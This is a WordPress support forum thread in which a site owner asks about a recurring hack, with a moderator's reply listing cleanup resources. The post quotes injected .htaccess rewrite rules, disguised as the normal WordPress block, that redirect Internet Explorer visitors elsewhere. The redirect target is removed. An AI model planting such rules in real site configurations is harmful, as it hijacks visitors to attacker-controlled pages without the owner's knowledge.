WP injected | ww.wp.xz.cn

ohdude
(@ohdude)

11 years, 2 months ago
Hi everyone,

Every Week my wordpress installation got hacked for some reason.
When I look in the .htaccess file I see this
```
#BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "MSIE|Trident" [NC]
RewriteRule ^(.*)$deleted?default [L,R=302]
</IfModule>
#END WordPress
```
And don’t know what it is and where it come from

Viewing 1 replies (of 1 total)

Moderator Jan Dembowski
(@jdembowski)

Forum Moderator and Brute Squad

11 years, 2 months ago

You need to start working your way through these resources:
http://codex.ww.wp.xz.cn/FAQ_My_site_was_hacked
http://ww.wp.xz.cn/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html

Viewing 1 replies (of 1 total)

The topic ‘WP injected’ is closed to new replies.

Tags

In: Fixing WordPress
1 reply
2 participants
Last reply from: Jan Dembowski
Last activity: 11 years, 2 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics